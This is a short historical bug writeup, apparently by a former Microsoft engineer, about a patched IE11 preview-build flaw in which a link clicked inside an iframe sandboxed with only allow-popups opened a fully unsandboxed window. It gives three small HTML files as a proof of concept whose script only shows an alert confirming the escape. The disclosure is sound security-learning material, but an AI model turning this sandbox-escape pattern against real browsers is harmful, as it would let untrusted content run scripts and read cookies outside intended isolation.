A sandboxed iFrame with only allow-popups should be able to open links in new tabs but the new window should remain sandboxed. On IE11 Blue build 9412, however, clicking a link from the sandboxed iFrame opened a new window that was completely outside the sandbox — able to run scripts, read cookies, and do everything a normal page can.

<!-- index.html -->
<iframe sandbox="allow-popups" src="sandboxed.html" width="600" height="60"></iframe>
<!-- sandboxed.html -->
I am a fully sandboxed iFrame, however, clicking on
<a href="out_of_sandbox.html" target="_blank">this link</a>
will open a new window out of sandbox!
<!-- out_of_sandbox.html: verifies the sandbox state -->
<h1>
    <div id="wrong">Oppss! It seems I am still sandboxed. Please, close this window and retry.</div>
</h1>
<script>
document.getElementById("wrong").innerText = "This window got rid of the sandbox!";
alert("Wow! I'm running scripts because I'm completely out of the sandbox!");
</script>

If the new window is still sandboxed, the script tag won’t run and the “still sandboxed” message remains. When the bug is present, the script runs and the message updates — confirming the sandbox was shed. Tested on IE11 Blue Build 9412.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.